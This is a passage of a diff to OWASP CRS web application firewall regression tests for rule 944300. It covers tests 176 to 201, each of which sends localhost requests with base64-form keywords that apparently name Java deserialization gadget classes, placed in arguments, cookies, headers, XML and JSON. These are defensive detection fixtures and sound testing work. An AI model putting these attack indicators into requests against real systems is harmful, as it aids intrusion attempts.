"en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"test\": \"aW5zdGFudGlhdGV0cmFuc2Zvcm1lcg\"}" + output: + log_contains: "id \"944300\"" + - test_id: 176 desc: "Content-Type application/json arg name includes keyword aW5zdGFudGlhdGV0cmFuc2Zvcm1lcg" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"aW5zdGFudGlhdGV0cmFuc2Zvcm1lcg\": \"test\"}" - output: - log_contains: "id \"944300\"" - - test_title: 944300-177 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"aW5zdGFudGlhdGV0cmFuc2Zvcm1lcg\": \"test\"}" + output: + log_contains: "id \"944300\"" + - test_id: 177 desc: "Argument test includes keyword Gluc3RhbnRpYXRldHJhbnNmb3JtZXI" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=Gluc3RhbnRpYXRldHJhbnNmb3JtZXI" - output: - log_contains: "id \"944300\"" - - test_title: 944300-178 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=Gluc3RhbnRpYXRldHJhbnNmb3JtZXI" + output: + log_contains: "id \"944300\"" + - test_id: 178 desc: "Argument name includes keyword Gluc3RhbnRpYXRldHJhbnNmb3JtZXI" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "Gluc3RhbnRpYXRldHJhbnNmb3JtZXI=test" - output: - log_contains: "id \"944300\"" - - test_title: 944300-179 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "Gluc3RhbnRpYXRldHJhbnNmb3JtZXI=test" + output: + log_contains: "id \"944300\"" + - test_id: 179 desc: "Cookie test includes keyword Gluc3RhbnRpYXRldHJhbnNmb3JtZXI" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: test=Gluc3RhbnRpYXRldHJhbnNmb3JtZXI - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944300\"" - - test_title: 944300-180 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=Gluc3RhbnRpYXRldHJhbnNmb3JtZXI + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944300\"" + - test_id: 180 desc: "Cookie name includes keyword Gluc3RhbnRpYXRldHJhbnNmb3JtZXI" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: Gluc3RhbnRpYXRldHJhbnNmb3JtZXI=test - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944300\"" - - test_title: 944300-181 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: Gluc3RhbnRpYXRldHJhbnNmb3JtZXI=test + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944300\"" + - test_id: 181 desc: "Request header test includes keyword Gluc3RhbnRpYXRldHJhbnNmb3JtZXI" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - test: Gluc3RhbnRpYXRldHJhbnNmb3JtZXI - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944300\"" - - test_title: 944300-182 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: Gluc3RhbnRpYXRldHJhbnNmb3JtZXI + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944300\"" + - test_id: 182 desc: "XML attribute value includes keyword Gluc3RhbnRpYXRldHJhbnNmb3JtZXI" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "element_value" - output: - log_contains: "id \"944300\"" - - test_title: 944300-183 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "element_value" + output: + log_contains: "id \"944300\"" + - test_id: 183 desc: "XML element value includes keyword Gluc3RhbnRpYXRldHJhbnNmb3JtZXI" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "Gluc3RhbnRpYXRldHJhbnNmb3JtZXI" - output: - log_contains: "id \"944300\"" - - test_title: 944300-184 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "Gluc3RhbnRpYXRldHJhbnNmb3JtZXI" + output: + log_contains: "id \"944300\"" + - test_id: 184 desc: "Nested XML element value includes keyword Gluc3RhbnRpYXRldHJhbnNmb3JtZXI" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "Gluc3RhbnRpYXRldHJhbnNmb3JtZXI" - output: - log_contains: "id \"944300\"" - - test_title: 944300-185 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "Gluc3RhbnRpYXRldHJhbnNmb3JtZXI" + output: + log_contains: "id \"944300\"" + - test_id: 185 desc: "Content-Type text/plain includes keyword Gluc3RhbnRpYXRldHJhbnNmb3JtZXI" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "text/plain" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=Gluc3RhbnRpYXRldHJhbnNmb3JtZXI" - output: - log_contains: "id \"944300\"" - - test_title: 944300-186 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=Gluc3RhbnRpYXRldHJhbnNmb3JtZXI" + output: + log_contains: "id \"944300\"" + - test_id: 186 desc: "Content-Type application/json arg value includes keyword Gluc3RhbnRpYXRldHJhbnNmb3JtZXI" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"test\": \"Gluc3RhbnRpYXRldHJhbnNmb3JtZXI\"}" - output: - log_contains: "id \"944300\"" - - test_title: 944300-187 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"test\": \"Gluc3RhbnRpYXRldHJhbnNmb3JtZXI\"}" + output: + log_contains: "id \"944300\"" + - test_id: 187 desc: "Content-Type application/json arg name includes keyword Gluc3RhbnRpYXRldHJhbnNmb3JtZXI" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"Gluc3RhbnRpYXRldHJhbnNmb3JtZXI\": \"test\"}" - output: - log_contains: "id \"944300\"" - - test_title: 944300-188 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"Gluc3RhbnRpYXRldHJhbnNmb3JtZXI\": \"test\"}" + output: + log_contains: "id \"944300\"" + - test_id: 188 desc: "Argument test includes keyword BpbnN0YW50aWF0ZXRyYW5zZm9ybWVy" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=BpbnN0YW50aWF0ZXRyYW5zZm9ybWVy" - output: - log_contains: "id \"944300\"" - - test_title: 944300-189 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=BpbnN0YW50aWF0ZXRyYW5zZm9ybWVy" + output: + log_contains: "id \"944300\"" + - test_id: 189 desc: "Argument name includes keyword BpbnN0YW50aWF0ZXRyYW5zZm9ybWVy" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "BpbnN0YW50aWF0ZXRyYW5zZm9ybWVy=test" - output: - log_contains: "id \"944300\"" - - test_title: 944300-190 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "BpbnN0YW50aWF0ZXRyYW5zZm9ybWVy=test" + output: + log_contains: "id \"944300\"" + - test_id: 190 desc: "Cookie test includes keyword BpbnN0YW50aWF0ZXRyYW5zZm9ybWVy" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: test=BpbnN0YW50aWF0ZXRyYW5zZm9ybWVy - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944300\"" - - test_title: 944300-191 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=BpbnN0YW50aWF0ZXRyYW5zZm9ybWVy + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944300\"" + - test_id: 191 desc: "Cookie name includes keyword BpbnN0YW50aWF0ZXRyYW5zZm9ybWVy" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: BpbnN0YW50aWF0ZXRyYW5zZm9ybWVy=test - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944300\"" - - test_title: 944300-192 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: BpbnN0YW50aWF0ZXRyYW5zZm9ybWVy=test + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944300\"" + - test_id: 192 desc: "Request header test includes keyword BpbnN0YW50aWF0ZXRyYW5zZm9ybWVy" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - test: BpbnN0YW50aWF0ZXRyYW5zZm9ybWVy - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944300\"" - - test_title: 944300-193 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: BpbnN0YW50aWF0ZXRyYW5zZm9ybWVy + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944300\"" + - test_id: 193 desc: "XML attribute value includes keyword BpbnN0YW50aWF0ZXRyYW5zZm9ybWVy" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "element_value" - output: - log_contains: "id \"944300\"" - - test_title: 944300-194 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "element_value" + output: + log_contains: "id \"944300\"" + - test_id: 194 desc: "XML element value includes keyword BpbnN0YW50aWF0ZXRyYW5zZm9ybWVy" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "BpbnN0YW50aWF0ZXRyYW5zZm9ybWVy" - output: - log_contains: "id \"944300\"" - - test_title: 944300-195 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "BpbnN0YW50aWF0ZXRyYW5zZm9ybWVy" + output: + log_contains: "id \"944300\"" + - test_id: 195 desc: "Nested XML element value includes keyword BpbnN0YW50aWF0ZXRyYW5zZm9ybWVy" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "BpbnN0YW50aWF0ZXRyYW5zZm9ybWVy" - output: - log_contains: "id \"944300\"" - - test_title: 944300-196 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "BpbnN0YW50aWF0ZXRyYW5zZm9ybWVy" + output: + log_contains: "id \"944300\"" + - test_id: 196 desc: "Content-Type text/plain includes keyword BpbnN0YW50aWF0ZXRyYW5zZm9ybWVy" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "text/plain" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=BpbnN0YW50aWF0ZXRyYW5zZm9ybWVy" - output: - log_contains: "id \"944300\"" - - test_title: 944300-197 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=BpbnN0YW50aWF0ZXRyYW5zZm9ybWVy" + output: + log_contains: "id \"944300\"" + - test_id: 197 desc: "Content-Type application/json arg value includes keyword BpbnN0YW50aWF0ZXRyYW5zZm9ybWVy" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"test\": \"BpbnN0YW50aWF0ZXRyYW5zZm9ybWVy\"}" - output: - log_contains: "id \"944300\"" - - test_title: 944300-198 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"test\": \"BpbnN0YW50aWF0ZXRyYW5zZm9ybWVy\"}" + output: + log_contains: "id \"944300\"" + - test_id: 198 desc: "Content-Type application/json arg name includes keyword BpbnN0YW50aWF0ZXRyYW5zZm9ybWVy" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"BpbnN0YW50aWF0ZXRyYW5zZm9ybWVy\": \"test\"}" - output: - log_contains: "id \"944300\"" - - test_title: 944300-199 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"BpbnN0YW50aWF0ZXRyYW5zZm9ybWVy\": \"test\"}" + output: + log_contains: "id \"944300\"" + - test_id: 199 desc: "Argument test includes keyword aW52b2tlcnRyYW5zZm9ybWVy" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=aW52b2tlcnRyYW5zZm9ybWVy" - output: - log_contains: "id \"944300\"" - - test_title: 944300-200 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=aW52b2tlcnRyYW5zZm9ybWVy" + output: + log_contains: "id \"944300\"" + - test_id: 200 desc: "Argument name includes keyword aW52b2tlcnRyYW5zZm9ybWVy" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "aW52b2tlcnRyYW5zZm9ybWVy=test" - output: - log_contains: "id \"944300\"" - - test_title: 944300-201 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "aW52b2tlcnRyYW5zZm9ybWVy=test" + output: + log_contains: "id \"944300\"" + - test_id: 201 desc: "Cookie test includes keyword aW52b2tlcnRyYW5zZm9ybWVy" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - 